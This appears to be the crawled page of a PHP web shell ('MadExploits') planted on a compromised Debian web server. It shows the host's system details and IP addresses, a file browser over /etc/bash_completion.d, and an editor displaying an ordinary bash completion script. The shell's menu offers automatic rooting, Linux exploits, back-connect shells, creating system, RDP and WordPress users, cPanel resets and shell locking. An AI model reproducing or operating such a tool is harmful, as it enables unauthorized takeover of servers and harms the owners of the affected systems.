Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.117.148.44
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
bash_completion.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2
1.44
KB
-rw-r--r--
debconf
293
B
-rw-r--r--
fail2ban
5.37
KB
-rw-r--r--
git-prompt
439
B
-rw-r--r--
grub
10.88
KB
-rw-r--r--
initramfs-tools
713
B
-rw-r--r--
insserv
736
B
-rw-r--r--
perf
417
B
-rw-r--r--
pygmentize
1.04
KB
-rw-r--r--
unar
2.2
KB
-rw-r--r--
whiptail
345
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : initramfs-tools
# update-initramfs(8) completion _update_initramfs() { local cur prev valid_options # TODO: this can be "_get_comp_words_by_ref cur prev" once # bash-completion >= 1.2 is available, see #537139 cur=$(_get_cword) prev=${COMP_WORDS[COMP_CWORD-1]} # The only option that takes an argument is -k if [[ "$prev" == '-k' ]]; then # Complete with kernel versions _kernel_versions COMPREPLY=( $( compgen -W '${COMPREPLY[@]} all' -- "$cur" ) ) return; fi # Complete with available options (obtained from -h) valid_options=$( update-initramfs -h 2>&1 | \ sed -e '/^ -/!d;s/^ \(-\w\+\).*/\1/' ) COMPREPLY=( $( compgen -W "$valid_options" -- $cur ) ) } complete -F _update_initramfs update-initramfs
Close